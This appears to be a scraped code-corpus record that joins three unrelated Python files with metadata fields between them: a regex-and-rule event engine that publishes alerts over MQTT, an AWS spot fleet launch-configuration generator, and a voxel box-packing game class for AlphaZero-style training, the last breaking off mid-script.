dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['regexs'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_regexs(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs']
def get_regex_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs'][name]
def enable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def has_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['rules']
def add_rule(self, name, rule):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name] = rule
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['rules'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_rules(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules']
def get_rule_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules'][name]
def enable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def is_regex(self, data):
if len(data) == 2 and 'value' in data and 'enabled' in data:
if isinstance(data['value'], str) and isinstance(data['enabled'], bool):
pass
else:
return False
else:
return False
return True
def is_rule(self, data):
if len(data) == 8 and 'enabled' in data and 'name' in data and 'regexs_yes' in data and 'regexs_no' in data and 'mode' in data and 'hold' in data and 'window' in data and 'output_topic' in data:
if isinstance(data['enabled'], bool) and isinstance(data['name'], str) and isinstance(data['regexs_yes'], dict) and isinstance(data['regexs_no'], dict) and isinstance(data['mode'], str) and isinstance(data['window'], int) and isinstance(data['hold'], int) and isinstance(data['output_topic'], str):
for regex in data['regexs_yes']:
if isinstance(data['regexs_yes'][regex], str):
pass
else:
return False
else:
return False
else:
return False
return True
def is_config(self, data):
if len(data) == 2 and 'regexs' in data and 'rules' in data:
if isinstance(data['regexs'], dict) and isinstance(data['rules'], dict):
for regex in data['regexs']:
if self.is_regex(data['regexs'][regex]):
pass
else:
return False
for rule in data['rules']:
if self.is_rule(data['rules'][rule]):
pass
else:
return False
else:
return False
else:
return False
return True
| from time import time, sleep
from re import search
from threading import Thread, Lock
from json import JSONEncoder, load, dump
import logging
class PayloadConsumer(Thread):
def __init__(self, payload, rules_handler, regexs_handler, database_handler):
Thread.__init__(self)
self.payload = payload
self.rules_handler = rules_handler
self.regexs_handler = regexs_handler
self.database_handler = database_handler
def look_for_regexs(self):
try:
result = []
for regex in self.regexs_handler.regexs:
r = search(self.regexs_handler.regexs[regex], self.payload)
if r is not None:
result.append(regex)
return result
except Exception as e:
logging.error('Error in PayloadConsumer.look_for_regexs: ' + str(e))
return result
def run(self):
try:
matches = self.look_for_regexs()
for match in matches:
timestamp = int(time())
self.database_handler.insert_match(timestamp, match)
self.rules_handler.handle_match(match, self.payload)
logging.debug("Got match for regex " + match)
except Exception as e:
logging.error('Error in PayloadConsumer.run: ' + str(e))
class RegexsHandler(object):
def __init__(self):
try:
self.regexs = {}
except Exception as e:
logging.error('Error in RegexsHandler.__init__: ' + str(e))
def add_regex(self, name, value):
try:
self.regexs[name] = value
logging.debug("Added regex " + name + " : " + value)
except Exception as e:
logging.error('Error in RegexsHandler.add_regex: ' + str(e))
def reset(self):
del self.regexs
self.regexs = {}
class Rule(object):
def __init__(self, regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client):
try:
self.regexs_yes = regexs_yes
self.regexs_no = regexs_no
self.window = window
self.mode = mode
self.hold = hold
self.name = name
self.mqtt_client = mqtt_client
self.output_topic = output_topic
self.callback_template = None
self.pending = False
self.remaining_regexs = list(self.regexs_yes)
self.start_time = None
self.completed = False
self.completed_time = None
self.triggering_payloads = {}
except Exception as e:
logging.error('Error in Rule.__init__: ' + str(e))
def has_regex(self, regex):
try:
if not len(self.remaining_regexs) == 0:
if self.mode == "strict":
if self.remaining_regexs[0] == regex:
return True
else:
return False
else:
if regex in self.remaining_regexs:
return True
else:
return False
else:
return False
except Exception as e:
logging.error('Error in Rule.has_regex: ' + str(e))
return False
def is_completed(self):
return self.completed
def complete(self):
self.completed = True
self.completed_time = time()
def is_finished(self):
res = False
if ((len(self.remaining_regexs) == 0) or (self.mode == "one")):
res = True
return res
def is_expired(self):
return time() - self.start_time > self.window
def is_on_hold(self):
return time() - self.completed_time < self.hold
def del_regex(self, regex):
try:
del self.remaining_regexs[self.remaining_regexs.index(regex)]
except Exception as e:
logging.error('Error in Rule.del_regex: ' + str(e))
def reset_rule(self):
try:
self.pending = False
self.completed = False
self.completed_time = None
self.remaining_regexs = list(self.regexs_yes)
self.triggering_payloads = {}
self.callback_payload = ""
except Exception as e:
logging.error('Error in Rule.reset_rule: ' + str(e))
def start_rule(self):
try:
self.pending = True
self.start_time = time()
logging.debug("Initiated rule " + self.name)
except Exception as e:
logging.error('Error in Rule.start_rule: ' + str(e))
def callback(self):
try:
#TODO support jinja template to format callback payload
self.callback_payload = JSONEncoder().encode(
{
"timestamp": int(time()),
"name": self.name,
"triggering_payload": self.triggering_payloads
}
)
logging.info('Triggered rule \'' + self.name + '\'')
self.mqtt_client.publish(self.output_topic, self.callback_payload)
except Exception as e:
logging.error('Error in Rule.callback: ' + str(e))
class RulesHandler(Thread):
def __init__(self, database_handler):
Thread.__init__(self)
self.rules = []
self.database_handler = database_handler
def add_rule(self, rule):
try:
self.rules.append(rule)
except Exception as e:
logging.error('Error in RulesHandler.add_rule: ' + str(e))
def check_rules(self):
try:
for rule in self.rules:
if rule.pending:
if rule.completed:
if rule.is_on_hold():
pass
else:
trigger = True
for value in rule.regexs_no:
timestamp = int(time()) - rule.regexs_no[value]
if self.database_handler.check_for_value(timestamp, value):
logging.debug("Cancelling rule " + rule.name + " because \'regex_no\' " + value + " was found in the last " + str(rule.regexs_no[value]) + " seconds")
trigger = False
if trigger:
rule.callback()
else:
pass
rule.reset_rule()
else:
if rule.is_finished():
rule.complete()
elif rule.is_expired():
rule.reset_rule()
logging.debug("Reseted rule " + rule.name + " because of expiration")
except Exception as e:
logging.error('Error in RulesHandler.check_rules: ' + str(e))
def handle_match(self, name, payload):
try:
for rule in self.rules:
if rule.pending:
if rule.has_regex(name):
rule.del_regex(name)
rule.triggering_payloads[name] = payload
else:
if rule.has_regex(name):
rule.start_rule()
rule.triggering_payloads[name] = payload
rule.del_regex(name)
except Exception as e:
logging.error('Error in RulesHandler.handle_match: ' + str(e))
def reset(self):
del self.rules
self.rules = []
def run(self):
try:
while True:
self.check_rules()
sleep(0.05)
except Exception as e:
logging.error('Error in RulesHandler.run: ' + str(e))
def create_rules_handler(database_handler):
rules_handler = RulesHandler(database_handler)
rules_handler.daemon = True
rules_handler.start()
return rules_handler
def create_rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client, rules_handler):
isPresent = False
for rule in rules_handler.rules:
if rule.name == name:
isPresent = True
if not isPresent:
rule = Rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client)
rules_handler.add_rule(rule)
logging.debug("Added rule " + name)
else:
logging.error('Tried to add rule with name ' + name + ' but a rule with the same name already exists, aborting...')
class ConfigHandler(object):
def __init__(self):
self.file_name = "core/config.json"
self.lock = Lock()
def get_config(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data
def has_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['regexs']
def add_regex(self, name, regex):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name] = regex
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['regexs'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_regexs(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs']
def get_regex_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs'][name]
def enable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def has_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['rules']
def add_rule(self, name, rule):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name] = rule
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['rules'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_rules(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules']
def get_rule_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules'][name]
def enable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def is_regex(self, data):
if len(data) == 2 and 'value' in data and 'enabled' in data:
if isinstance(data['value'], str) and isinstance(data['enabled'], bool):
pass
else:
return False
else:
return False
return True
def is_rule(self, data):
if len(data) == 8 and 'enabled' in data and 'name' in data and 'regexs_yes' in data and 'regexs_no' in data and 'mode' in data and 'hold' in data and 'window' in data and 'output_topic' in data:
if isinstance(data['enabled'], bool) and isinstance(data['name'], str) and isinstance(data['regexs_yes'], dict) and isinstance(data['regexs_no'], dict) and isinstance(data['mode'], str) and isinstance(data['window'], int) and isinstance(data['hold'], int) and isinstance(data['output_topic'], str):
for regex in data['regexs_yes']:
if isinstance(data['regexs_yes'][regex], str):
pass
else:
return False
else:
return False
else:
return False
return True
def is_config(self, data):
if len(data) == 2 and 'regexs' in data and 'rules' in data:
if isinstance(data['regexs'], dict) and isinstance(data['rules'], dict):
for regex in data['regexs']:
if self.is_regex(data['regexs'][regex]):
pass
else:
return False
for rule in data['rules']:
if self.is_rule(data['rules'][rule]):
pass
else:
return False
else:
return False
else:
return False
return True | en | 0.443403 | #TODO support jinja template to format callback payload | 2.504146 | 3 |
mcmweb/aws_spot_fleet_helper/spot_fleet_config.py | equake/aws-spot-fleet-helper | 2 | 6616768 | <reponame>equake/aws-spot-fleet-helper<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import re
from base64 import b64encode
from datetime import datetime, timedelta
from string import Template
from mcmweb import aws_spot_fleet_helper
BASE_PATH = os.path.dirname(os.path.realpath(aws_spot_fleet_helper.__file__))
DEFAULT_FLEET_ROLE = 'aws-ec2-spot-fleet-role'
INSTANCE_WEIGHT = {
'nano': 1,
'micro': 1,
'small': 1,
'medium': 1,
'large': 2,
'xlarge': 4,
'2xlarge': 8,
'4xlarge': 16,
'8xlarge': 36,
'10xlarge': 40
}
FLEET_ROLE_ARN = 'arn:aws:iam::%(_account_id)i:role/%(_fleet_role)s'
INSTANCE_PROFILE_ARN = 'arn:aws:iam::%(_account_id)i:instance-profile/%(_iam_role)s'
PATTERN_AMI_ID = re.compile('^ami-[0-9a-f]{8,}$')
PATTERN_INSTANCE_TYPE = re.compile('^[a-z]+[0-9]+\.([0-9]+)?(nano|micro|small|medium|large|xlarge)$')
PATTERN_SECURITY_GROUP_ID = re.compile('^sg-[0-9a-f]{8,}$')
PATTERN_SUBNET_ID = re.compile('^subnet-[0-9a-f]{8,}$')
class SpotFleetConfig(object):
_instance_types = []
_monitoring = True
_security_groups = []
_subnet_ids = []
_target_capacity = 1
_user_data = None
def __init__(self, account_id, bid_value, ssh_key_name, ami_id, iam_role, tags=None, assign_public_ip=None, fleet_role=DEFAULT_FLEET_ROLE):
"""
SpotFleet
Generate the LaunchSpecification JSON config file for deploying spot fleets
:param account_id: AWS account id
:param bid_value: Maximum bid value per VCPU in USD
:param ssh_key_name: SSH key name to be used
:param ami_id: Amazon Machine Image id to deploy
:param iam_role: Instance IAM role
:param assign_public_ip: Assign public ip to launched instances
:param fleet_role: IAM role used to deploy assets
"""
self._account_id = int(account_id)
self._bid_value = bid_value
self._ssh_key_name = ssh_key_name
self._ami_id = ami_id
self._iam_role = iam_role
self._assign_public_ip = assign_public_ip
self._fleet_role = fleet_role
self._tags = self.__parse_tags(tags)
@staticmethod
def __parse_tags(tags):
if not tags:
return {}
if isinstance(tags, list):
return {key.strip(): value.strip() for key, value in [tag.strip().split('=') for tag in args.tags]}
elif isinstance(tags, dict):
return tags
else:
raise ValidationException('Unknown tag format: %s' % tags)
@staticmethod
def __instance_weight(instance_type_name):
""" Infer instance weight/cpu count based on instance type name """
size = instance_type_name.rsplit('.', 1)[1]
weight = INSTANCE_WEIGHT.get(size)
if not weight:
raise ValidationException('Invalid instance type: %s' % instance_type_name)
return weight
def _build_base_object(self):
now = datetime.now()
return {
'AllocationStrategy': 'lowestPrice',
'IamFleetRole': FLEET_ROLE_ARN % self.__dict__,
'SpotPrice': str(self._bid_value),
'TargetCapacity': self._target_capacity,
'TerminateInstancesWithExpiration': True,
'Type': 'maintain',
'ValidFrom': now.isoformat().split('.')[0] + 'Z',
'ValidUntil': (now + timedelta(weeks=520)).isoformat().split('.')[0] + 'Z',
'LaunchSpecifications': []
}
def _build_security_groups_object(self):
if not self._security_groups:
raise ValidationException('Please provide at least one security_group')
sgs = []
for sg in self._security_groups:
sgs.append(sg)
return sgs
def _build_launch_specs_object(self):
if not self._instance_types:
raise ValidationException('Please provide at least one instance_type')
if not self._subnet_ids:
raise ValidationException('Please provide at least one subnet_id')
sg_config = self._build_security_groups_object()
encoded_user_data = None
if self._tags or self._user_data:
with open(os.path.join(BASE_PATH, 'spot_fleet_tagger.py'), 'r') as f_tmpl:
raw_template = f_tmpl.read()
template = Template(raw_template)
template_data = {'tags': '', 'original_script': ''}
if self._tags:
template_data['tags'] = json.dumps(self._tags)
if self._user_data:
template_data['original_script'] = self._user_data
encoded_user_data = b64encode(template.substitute(template_data))
for it in self._instance_types:
for sid in self._subnet_ids:
spec = {
'ImageId': self._ami_id,
'InstanceType': it,
'KeyName': self._ssh_key_name,
'WeightedCapacity': self.__instance_weight(it),
'Monitoring': {'Enabled': bool(self._monitoring)},
'IamInstanceProfile': {'Arn': INSTANCE_PROFILE_ARN % self.__dict__},
'NetworkInterfaces': [{
'DeviceIndex': 0,
'Groups': sg_config,
'SubnetId': sid
}]
}
if self._assign_public_ip is not None:
spec['NetworkInterfaces'][0]['AssociatePublicIpAddress'] = bool(self._assign_public_ip)
if encoded_user_data:
spec['UserData'] = encoded_user_data
yield spec
def add_instance_type(self, instance_type):
if not PATTERN_INSTANCE_TYPE.match(instance_type):
raise ValidationException('Invalid instance type "%s"' % instance_type)
self._instance_types.append(instance_type)
def add_security_group_id(self, security_group):
if not PATTERN_SECURITY_GROUP_ID.match(security_group):
raise ValidationException('Invalid security group "%s"' % security_group)
self._security_groups.append(security_group)
def add_subnet_id(self, subnet_id):
if not PATTERN_SUBNET_ID.match(subnet_id):
raise ValidationException('Invalid subnet "%s"' % subnet_id)
self._subnet_ids.append(subnet_id)
def should_assign_public_ip(self, public_ip):
self._assign_public_ip = bool(public_ip)
def set_user_data(self, user_data):
if not user_data:
return
self._user_data = user_data
def generate(self):
"""
Build an configuration object
:rtype: dict
"""
fleet_config = self._build_base_object()
fleet_config['LaunchSpecifications'] = list(self._build_launch_specs_object())
return fleet_config
def __str__(self):
"""
Full json output!
:rtype: str
"""
return json.dumps(self.generate(), indent=2)
class ValidationException(Exception):
pass
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='Tool to launch a fleet of Spot instances within AWS infrastructure')
parser.add_argument('account_id', metavar='account-id', type=int, help='AWS account id')
parser.add_argument('-bid-value', type=float, required=True, help='Maximum bid value per VCPU in USD')
parser.add_argument('-ssh-key-name', type=str, required=True, help='SSH key name to be used')
parser.add_argument('-ami-id', type=str, required=True, help='Amazon Machine Image id to deploy')
parser.add_argument('-iam-role', type=str, required=True, help='Instance IAM role')
parser.add_argument('-instance-type', type=str, required=True, nargs='+', help='Instance types to deploy (ex: c3.4xlarge, m3.medium)')
parser.add_argument('-security-group', type=str, required=True, nargs='+', help='Security Group ids to deploy')
parser.add_argument('-subnet-id', type=str, required=True, nargs='+', help='Subnet ids to deploy')
parser.add_argument('--assign-public-ip', type=bool, help='Assign public ip to launched instances')
parser.add_argument('--fleet-role', type=str, default=DEFAULT_FLEET_ROLE, help='IAM role used to deploy assets (default: %s)' % DEFAULT_FLEET_ROLE)
parser.add_argument('--tags', type=str, nargs='+', help='AMI tags. Format: "key=value"')
parser.add_argument('--user-data', type=str, help='User data to be included in instance launch configuration. File name or "-" for reading from stdin')
args = parser.parse_args()
config = SpotFleetConfig(args.account_id, args.bid_value, args.ssh_key_name, args.ami_id, args.iam_role, args.tags, args.assign_public_ip, args.fleet_role)
try:
for arg_instance_type in args.instance_type:
config.add_instance_type(arg_instance_type)
for arg_security_group in args.security_group:
config.add_security_group_id(arg_security_group)
for arg_subnet_id in args.subnet_id:
config.add_subnet_id(arg_subnet_id)
if args.user_data:
user_data = ''
if args.user_data == '-':
for line in sys.stdin:
user_data += line
else:
with open(args.user_data, 'r') as user_data_file:
user_data += user_data_file.readline()
config.set_user_data(user_data)
print(config)
sys.exit(0)
except Exception as e:
print('%s: %s' % (e.__class__.__name__, str(e)), file=sys.stderr)
print('Please verify if all of your parameters are right!', file=sys.stderr)
sys.exit(100)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import re
from base64 import b64encode
from datetime import datetime, timedelta
from string import Template
from mcmweb import aws_spot_fleet_helper
BASE_PATH = os.path.dirname(os.path.realpath(aws_spot_fleet_helper.__file__))
DEFAULT_FLEET_ROLE = 'aws-ec2-spot-fleet-role'
INSTANCE_WEIGHT = {
'nano': 1,
'micro': 1,
'small': 1,
'medium': 1,
'large': 2,
'xlarge': 4,
'2xlarge': 8,
'4xlarge': 16,
'8xlarge': 36,
'10xlarge': 40
}
FLEET_ROLE_ARN = 'arn:aws:iam::%(_account_id)i:role/%(_fleet_role)s'
INSTANCE_PROFILE_ARN = 'arn:aws:iam::%(_account_id)i:instance-profile/%(_iam_role)s'
PATTERN_AMI_ID = re.compile('^ami-[0-9a-f]{8,}$')
PATTERN_INSTANCE_TYPE = re.compile('^[a-z]+[0-9]+\.([0-9]+)?(nano|micro|small|medium|large|xlarge)$')
PATTERN_SECURITY_GROUP_ID = re.compile('^sg-[0-9a-f]{8,}$')
PATTERN_SUBNET_ID = re.compile('^subnet-[0-9a-f]{8,}$')
class SpotFleetConfig(object):
_instance_types = []
_monitoring = True
_security_groups = []
_subnet_ids = []
_target_capacity = 1
_user_data = None
def __init__(self, account_id, bid_value, ssh_key_name, ami_id, iam_role, tags=None, assign_public_ip=None, fleet_role=DEFAULT_FLEET_ROLE):
"""
SpotFleet
Generate the LaunchSpecification JSON config file for deploying spot fleets
:param account_id: AWS account id
:param bid_value: Maximum bid value per VCPU in USD
:param ssh_key_name: SSH key name to be used
:param ami_id: Amazon Machine Image id to deploy
:param iam_role: Instance IAM role
:param assign_public_ip: Assign public ip to launched instances
:param fleet_role: IAM role used to deploy assets
"""
self._account_id = int(account_id)
self._bid_value = bid_value
self._ssh_key_name = ssh_key_name
self._ami_id = ami_id
self._iam_role = iam_role
self._assign_public_ip = assign_public_ip
self._fleet_role = fleet_role
self._tags = self.__parse_tags(tags)
@staticmethod
def __parse_tags(tags):
if not tags:
return {}
if isinstance(tags, list):
return {key.strip(): value.strip() for key, value in [tag.strip().split('=') for tag in args.tags]}
elif isinstance(tags, dict):
return tags
else:
raise ValidationException('Unknown tag format: %s' % tags)
@staticmethod
def __instance_weight(instance_type_name):
""" Infer instance weight/cpu count based on instance type name """
size = instance_type_name.rsplit('.', 1)[1]
weight = INSTANCE_WEIGHT.get(size)
if not weight:
raise ValidationException('Invalid instance type: %s' % instance_type_name)
return weight
def _build_base_object(self):
now = datetime.now()
return {
'AllocationStrategy': 'lowestPrice',
'IamFleetRole': FLEET_ROLE_ARN % self.__dict__,
'SpotPrice': str(self._bid_value),
'TargetCapacity': self._target_capacity,
'TerminateInstancesWithExpiration': True,
'Type': 'maintain',
'ValidFrom': now.isoformat().split('.')[0] + 'Z',
'ValidUntil': (now + timedelta(weeks=520)).isoformat().split('.')[0] + 'Z',
'LaunchSpecifications': []
}
def _build_security_groups_object(self):
if not self._security_groups:
raise ValidationException('Please provide at least one security_group')
sgs = []
for sg in self._security_groups:
sgs.append(sg)
return sgs
def _build_launch_specs_object(self):
if not self._instance_types:
raise ValidationException('Please provide at least one instance_type')
if not self._subnet_ids:
raise ValidationException('Please provide at least one subnet_id')
sg_config = self._build_security_groups_object()
encoded_user_data = None
if self._tags or self._user_data:
with open(os.path.join(BASE_PATH, 'spot_fleet_tagger.py'), 'r') as f_tmpl:
raw_template = f_tmpl.read()
template = Template(raw_template)
template_data = {'tags': '', 'original_script': ''}
if self._tags:
template_data['tags'] = json.dumps(self._tags)
if self._user_data:
template_data['original_script'] = self._user_data
encoded_user_data = b64encode(template.substitute(template_data))
for it in self._instance_types:
for sid in self._subnet_ids:
spec = {
'ImageId': self._ami_id,
'InstanceType': it,
'KeyName': self._ssh_key_name,
'WeightedCapacity': self.__instance_weight(it),
'Monitoring': {'Enabled': bool(self._monitoring)},
'IamInstanceProfile': {'Arn': INSTANCE_PROFILE_ARN % self.__dict__},
'NetworkInterfaces': [{
'DeviceIndex': 0,
'Groups': sg_config,
'SubnetId': sid
}]
}
if self._assign_public_ip is not None:
spec['NetworkInterfaces'][0]['AssociatePublicIpAddress'] = bool(self._assign_public_ip)
if encoded_user_data:
spec['UserData'] = encoded_user_data
yield spec
def add_instance_type(self, instance_type):
if not PATTERN_INSTANCE_TYPE.match(instance_type):
raise ValidationException('Invalid instance type "%s"' % instance_type)
self._instance_types.append(instance_type)
def add_security_group_id(self, security_group):
if not PATTERN_SECURITY_GROUP_ID.match(security_group):
raise ValidationException('Invalid security group "%s"' % security_group)
self._security_groups.append(security_group)
def add_subnet_id(self, subnet_id):
if not PATTERN_SUBNET_ID.match(subnet_id):
raise ValidationException('Invalid subnet "%s"' % subnet_id)
self._subnet_ids.append(subnet_id)
def should_assign_public_ip(self, public_ip):
self._assign_public_ip = bool(public_ip)
def set_user_data(self, user_data):
if not user_data:
return
self._user_data = user_data
def generate(self):
"""
Build an configuration object
:rtype: dict
"""
fleet_config = self._build_base_object()
fleet_config['LaunchSpecifications'] = list(self._build_launch_specs_object())
return fleet_config
def __str__(self):
"""
Full json output!
:rtype: str
"""
return json.dumps(self.generate(), indent=2)
class ValidationException(Exception):
pass
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='Tool to launch a fleet of Spot instances within AWS infrastructure')
parser.add_argument('account_id', metavar='account-id', type=int, help='AWS account id')
parser.add_argument('-bid-value', type=float, required=True, help='Maximum bid value per VCPU in USD')
parser.add_argument('-ssh-key-name', type=str, required=True, help='SSH key name to be used')
parser.add_argument('-ami-id', type=str, required=True, help='Amazon Machine Image id to deploy')
parser.add_argument('-iam-role', type=str, required=True, help='Instance IAM role')
parser.add_argument('-instance-type', type=str, required=True, nargs='+', help='Instance types to deploy (ex: c3.4xlarge, m3.medium)')
parser.add_argument('-security-group', type=str, required=True, nargs='+', help='Security Group ids to deploy')
parser.add_argument('-subnet-id', type=str, required=True, nargs='+', help='Subnet ids to deploy')
parser.add_argument('--assign-public-ip', type=bool, help='Assign public ip to launched instances')
parser.add_argument('--fleet-role', type=str, default=DEFAULT_FLEET_ROLE, help='IAM role used to deploy assets (default: %s)' % DEFAULT_FLEET_ROLE)
parser.add_argument('--tags', type=str, nargs='+', help='AMI tags. Format: "key=value"')
parser.add_argument('--user-data', type=str, help='User data to be included in instance launch configuration. File name or "-" for reading from stdin')
args = parser.parse_args()
config = SpotFleetConfig(args.account_id, args.bid_value, args.ssh_key_name, args.ami_id, args.iam_role, args.tags, args.assign_public_ip, args.fleet_role)
try:
for arg_instance_type in args.instance_type:
config.add_instance_type(arg_instance_type)
for arg_security_group in args.security_group:
config.add_security_group_id(arg_security_group)
for arg_subnet_id in args.subnet_id:
config.add_subnet_id(arg_subnet_id)
if args.user_data:
user_data = ''
if args.user_data == '-':
for line in sys.stdin:
user_data += line
else:
with open(args.user_data, 'r') as user_data_file:
user_data += user_data_file.readline()
config.set_user_data(user_data)
print(config)
sys.exit(0)
except Exception as e:
print('%s: %s' % (e.__class__.__name__, str(e)), file=sys.stderr)
print('Please verify if all of your parameters are right!', file=sys.stderr)
sys.exit(100) | en | 0.631935 | #!/usr/bin/env python # -*- coding: utf-8 -*- SpotFleet Generate the LaunchSpecification JSON config file for deploying spot fleets :param account_id: AWS account id :param bid_value: Maximum bid value per VCPU in USD :param ssh_key_name: SSH key name to be used :param ami_id: Amazon Machine Image id to deploy :param iam_role: Instance IAM role :param assign_public_ip: Assign public ip to launched instances :param fleet_role: IAM role used to deploy assets Infer instance weight/cpu count based on instance type name Build an configuration object :rtype: dict Full json output! :rtype: str | 1.833767 | 2 |
voxel/VoxelGame.py | vincentlooi/alpha_zero | 0 | 6616769 | from __future__ import print_function
import sys
sys.path.append('..')
# from Game import Game
# from .TetrisLogic import Board, BoardRenderer
from VoxelLogic import Board
import numpy as np
import random
class VoxelGame(object):
def __init__(self,x,y,z,n):
self.x = x
self.y = y
self.z = z
self.n = n
self.board = Board(x,y,z,n)
def getInitBoard(self):
# return initial board (numpy board)
self.board.reset()
return self.board
def getBoardSize(self):
return (self.board.len_z, self.board.len_y, self.board.len_x)
def getActionSize(self):
# return number of actions
# return self.n*self.n + 1
# box_list_cnt = len(getInitBoxList())
# board_sz = np.size(getInitBoard())
# return board_sz * box_list_cnt + 1
return self.board.total_actions + 1 # + 1 for end game action
def boardIndexToSquare(self, idx):
return self.board.boardIndexToSquare(idx)
def getNextState(self, board_obj, action):
# if player takes action on board, return next (board,player)
# action must be a valid move
if action == self.getActionSize():
return board_obj
b = board_obj
b.execute_move(action)
return b
def getValidMoves(self, board_obj):
# return a fixed size binary vector
valids = [0] * self.getActionSize()
b = board_obj
legalMoves = b.get_legal_moves_all()
if len(legalMoves)==0:
valids[-1]=1
else:
for ix in legalMoves:
valids[ix]=1
return np.array(valids)
def getGameEnded(self, board_obj):
# return 0 if not ended, 1 if player 1 won, -1 if player 1 lost
# player = 1
return not board_obj.has_legal_moves_all()
def getScore(self, board_obj):
return board_obj.get_score()
def getCanonicalForm(self, board_obj):
# return state if player==1, else return -state if player==-1
return board_obj
def getSymmetries(self, board_obj, pi):
'''
pi is the policy output (size: total actions)
'''
# horizontal flip only
assert(len(pi) == self.getActionSize()) # 1 for pass
l = []
# for i in range(1, 5):
b = board_obj
board = board_obj.pieces
for j in [True, False]:
newB = board.copy() # np.rot90(board, i)
if j:
newB[:b.z] = np.array([np.fliplr(x) for x in b.pieces[:b.z]]) # only flip the top part!
newPi = self.flip_pi_LR(board_obj, pi)
newPi = list(newPi) + [pi[-1]]
else:
newPi = list(pi)
l += [(newB, newPi)]
return l
def flip_pi_LR(self, board_obj, pi):
b = board_obj
n = b.n
x = b.x
y = b.y
z = b.z
total_actions = b.total_actions
assert len(pi) >= total_actions == x * y * z * n
newPi_m = np.reshape(np.array(pi)[:total_actions], (n, z, y, x))
for box_ix, mask in enumerate(newPi_m):
# newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT!
box_w,_,_ = b.get_box_size_from_idx(box_ix)
if box_w == 0:
continue
mask = np.array([np.fliplr(m) for m in mask])
shift_x = box_w - 1 # shift to the left
mask[:,:,:x-shift_x] = mask[:,:,shift_x:]
mask[:,:,x-shift_x:] = 0
newPi_m[box_ix] = mask
return newPi_m.ravel()
def stringRepresentation(self, board_obj):
# 8x8 numpy array (canonical board)
return board_obj.pieces.tostring()
if __name__ == '__main__':
import copy
n = 5
x = 6
y = 4
z = 3
b = Board(x, y, z, n)
g = VoxelGame(x, y, z, n)
from VoxelRender import BoardRenderer
b_renderer = BoardRenderer(name='Normal')
b_renderer2 = BoardRenderer(name='Flipped')
flipped_b = copy.deepcopy(b)
